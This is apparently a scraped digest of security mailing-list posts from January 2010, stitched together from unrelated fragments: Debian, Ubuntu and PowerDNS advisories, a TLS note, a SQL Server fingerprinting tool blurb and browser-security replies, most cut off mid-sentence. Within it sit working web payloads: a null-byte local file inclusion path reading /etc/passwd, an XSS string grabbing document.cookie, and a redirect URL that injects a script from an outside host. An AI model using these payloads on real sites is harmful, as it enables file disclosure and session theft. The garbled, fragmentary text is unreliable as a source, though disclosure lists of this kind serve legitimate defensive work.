-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1965 secur...@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
January 06, 2010
Hello,
Some of you may be interested in this short technical note which
includes some recent observations about TLS renegotiation and other
issues:
http://www.vsecurity.com/download/papers/HTTPDigestIntegrity.pdf
Comments welcome,
tim
Introduction
Recent history has proven that
One thing i forgot, a %00 must be included at the end of the LFI, IE:
index.php?op=../../../../../../../etc/passwd%00
And ?op is vulnerable to a xss attack, IE:
index.php?op=alert(document.cookie)
Ignacio.
.:[Software Description:
This is a tool that performs version fingerprinting on Microsoft SQL Server
2000, 2005 and 2008, using well known techniques based on several public tools
that identifies the SQL Version. The strength of this tool is that it uses
probabilistic algorithm to identify the ver
Dear PowerDNS Users,
Two major vulnerabilities have recently been discovered in the PowerDNS
Recursor (all versions up to and including 3.1.7.1). Over the past two
weeks, these vulnerabilities have been addressed, resulting in PowerDNS
Recursor 3.1.7.2.
Given the nature and magnitude of these vul
Hi Berend-Jan
Please find the respective responses
> Repro steps:
> 1) Some website do not sanitize user input correctly, such as the one
> in your example, which allows things like XSS:
> http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c
===
Ubuntu Security Notice USN-879-1 January 06, 2010
krb5 vulnerability
CVE-2009-3295
===
A security issue affects the following Ubuntu releases:
Ubuntu 9.10
This advisory a
On Tue, Jan 05, 2010 at 10:49:07AM -0800, Michal Zalewski wrote:
> > Video: http://www.secniche.org/videos/google_chrome_link_inj.html
>
> You might find it informative to review the section of BSH on URL parsing:
> http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
Also, a